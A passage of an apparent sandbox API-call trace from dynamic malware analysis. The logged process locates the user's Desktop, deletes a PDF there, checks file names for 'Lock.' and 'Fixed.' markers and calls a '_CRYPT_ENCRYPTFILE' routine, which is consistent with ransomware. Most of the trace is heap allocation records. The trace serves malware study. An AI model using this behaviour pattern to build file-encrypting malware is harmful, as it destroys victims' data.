hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0155.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0155.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0155.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0155.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0155.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0155.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0155.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0155.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0155.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0155.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0155.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0155.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0155.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0155.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0155.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0155.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0155.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0155.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0155.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0155.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0155.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0155.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0155.405] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0155.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0155.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0155.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0155.405] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0155.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0155.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0155.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0155.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0155.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0155.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0155.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0155.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0155.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0155.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0155.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0155.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0155.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0155.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0155.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0155.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0155.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4a) returned 0x2e563a8 [0155.406] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/GUlu8dq_.pdf", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\GUlu8dq_.pdf", lpFilePart=0x8cedf4*="GUlu8dq_.pdf") returned 0x24 [0155.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0155.406] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\GUlu8dq_.pdf" (normalized: "c:\\users\\fd1hvy\\desktop\\gulu8dq_.pdf")) returned 0x20 [0155.407] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\GUlu8dq_.pdf", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd113baf0, ftCreationTime.dwHighDateTime=0x1d5e477, ftLastAccessTime.dwLowDateTime=0xee5cf880, ftLastAccessTime.dwHighDateTime=0x1d5ed4e, ftLastWriteTime.dwLowDateTime=0xee5cf880, ftLastWriteTime.dwHighDateTime=0x1d5ed4e, nFileSizeHigh=0x0, nFileSizeLow=0x14106, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="GUlu8dq_.pdf", cAlternateFileName="")) returned 0xa872d0 [0155.407] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\GUlu8dq_.pdf" (normalized: "c:\\users\\fd1hvy\\desktop\\gulu8dq_.pdf")) returned 1 [0155.408] FindNextFileW (in: hFindFile=0xa872d0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd113baf0, ftCreationTime.dwHighDateTime=0x1d5e477, ftLastAccessTime.dwLowDateTime=0xee5cf880, ftLastAccessTime.dwHighDateTime=0x1d5ed4e, ftLastWriteTime.dwLowDateTime=0xee5cf880, ftLastWriteTime.dwHighDateTime=0x1d5ed4e, nFileSizeHigh=0x0, nFileSizeLow=0x14106, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="GUlu8dq_.pdf", cAlternateFileName="")) returned 0 [0155.409] FindClose (in: hFindFile=0xa872d0 | out: hFindFile=0xa872d0) returned 1 [0155.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0155.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0155.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0155.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0155.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0155.409] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0155.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0155.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0155.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0155.409] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0155.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0155.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0155.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0155.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0155.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0155.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0155.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0155.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0155.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0155.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0155.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0155.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0155.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0155.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0155.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0155.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0155.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0155.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0155.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0155.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4a) returned 0x2e563a8 [0155.410] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/GUlu8dq_.pdf", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\GUlu8dq_.pdf", lpFilePart=0x8cf650*="GUlu8dq_.pdf") returned 0x24 [0155.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0155.410] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\GUlu8dq_.pdf" (normalized: "c:\\users\\fd1hvy\\desktop\\gulu8dq_.pdf")) returned 0xffffffff [0155.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0155.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0155.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0155.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0155.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0155.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0155.411] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0155.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0155.411] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0155.411] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0155.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0155.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0155.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0155.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0155.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0155.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0155.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0155.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0155.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0155.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0155.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0155.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0155.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0155.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HCYfZCy ufaMx.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0155.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CYfZCy ufaMx.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0155.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YfZCy ufaMx.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0155.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fZCy ufaMx.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0155.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZCy ufaMx.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0155.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cy ufaMx.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0155.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y ufaMx.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0155.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" ufaMx.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0155.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ufaMx.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0155.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="faMx.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0155.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aMx.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0155.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mx.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0155.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0155.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0155.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0155.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0155.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0155.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0155.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0155.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0155.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0155.412] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0155.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0155.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0155.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0155.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0155.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0155.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0155.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0155.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0155.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0155.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0155.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0155.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0155.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0155.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0155.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0155.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0155.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0155.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0155.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0155.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0155.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HCYfZCy ufaMx.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0155.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CYfZCy ufaMx.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0155.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YfZCy ufaMx.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0155.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fZCy ufaMx.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0155.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZCy ufaMx.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0155.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cy ufaMx.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0155.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y ufaMx.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0155.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" ufaMx.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0155.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ufaMx.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0155.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="faMx.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0155.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aMx.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0155.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mx.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0155.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0155.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0155.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0155.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0155.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0155.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0155.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0155.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0155.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0155.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0155.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0155.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0155.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0155.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0155.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0155.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0155.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0155.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0155.414] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0155.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0155.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0155.414] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0155.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0155.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0155.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0155.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b78 [0155.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0155.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0155.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0155.414] 